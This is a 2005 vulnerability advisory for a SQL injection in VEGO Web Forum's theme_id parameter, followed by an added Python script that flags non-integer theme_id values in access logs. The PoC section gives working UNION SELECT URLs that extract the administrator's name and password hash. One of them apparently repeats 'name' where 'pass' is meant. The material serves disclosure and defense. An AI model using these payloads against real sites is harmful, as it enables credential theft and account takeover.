SQL Injection Vulnerability in VEGO Web Forum
Summary
- Vulnerability: SQL Injection Vulnerability in VEGO Web Forum
- Discovered: 2005.12.28
- Last Update: 0 n/a
- ID: EV0001
- CVE: CVE-2006-0065
- Risk Level: medium
- Type: SQL Injection
- Status: Unpatched
- Vendor: VEGO (http://alas.matf.bg.ac.yu/~mr99067)
- Vulnerable Software: VEGO Web Forum
- Version: 1.26 and earlier
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
A SQL injection vulnerability was found in the VEGO Web Forum script.
Vulnerable scripts:
- php/functions.php
- php/functions_update.php
- php/functions_display.php
The theme_id variable isn't properly sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code through it and so make the application run any SQL query.
This threatens the administrator's authentication.
PoC/Exploit
Administrator's login name.
For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4%20from%20vwf_users%20where%20userid=1/*
Hash of administrator's password.
For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,pass,4%20from%20vwf_users%20where%20userid=1/*
Solution
A solution for "SQL Injection Vulnerability in VEGO Web Forum" is not available. Check the VEGO website for updates.
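With no vendor fix available, one defensive check is to review web server access logs for theme_id values that are not plain integers. The script below is an added example, not code from the advisory or from VEGO. It assumes common/combined log format and that legitimate theme_id values are bare non-negative integers; the sample log entries are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate theme_id values are bare non-negative integers.
VALID_THEME_ID = re.compile(r"[0-9]{1,10}")
# Request field of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample entries (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2006:10:00:00 +0000] '
    '"GET /webforum/index.php?theme_id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2006:10:00:07 +0000] '
    '"GET /webforum/index.php?theme_id=-1%20union%20select%201 HTTP/1.1" 200 4870',
    '203.0.113.9 - - [01/Jan/2006:10:00:09 +0000] '
    '"GET /webforum/index.php?theme_id=2&theme_id=2%27 HTTP/1.1" 200 4870',
    '203.0.113.7 - - [01/Jan/2006:10:00:12 +0000] '
    '"GET /webforum/index.php?page=2 HTTP/1.1" 200 3300',
]


def theme_id_is_valid(value):
    """Allow-list check: True only for a bare decimal integer."""
    return VALID_THEME_ID.fullmatch(value) is not None


def suspicious_theme_ids(log_lines):
    """Return (line_number, decoded_value) for each theme_id that fails the check."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes, so %20-encoded payloads are compared in clear.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for key, values in params.items():
            # PHP also accepts array syntax (theme_id[]=...), so match that too.
            if key == "theme_id" or key.startswith("theme_id["):
                hits.extend((number, v) for v in values if not theme_id_is_valid(v))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_theme_ids(SAMPLE_LOG):
        print(f"line {number}: rejected theme_id={value!r}")
```

The same allow-list test can be enforced in front of the forum (for example in a reverse proxy or request filter) so that non-integer theme_id values never reach the vulnerable scripts.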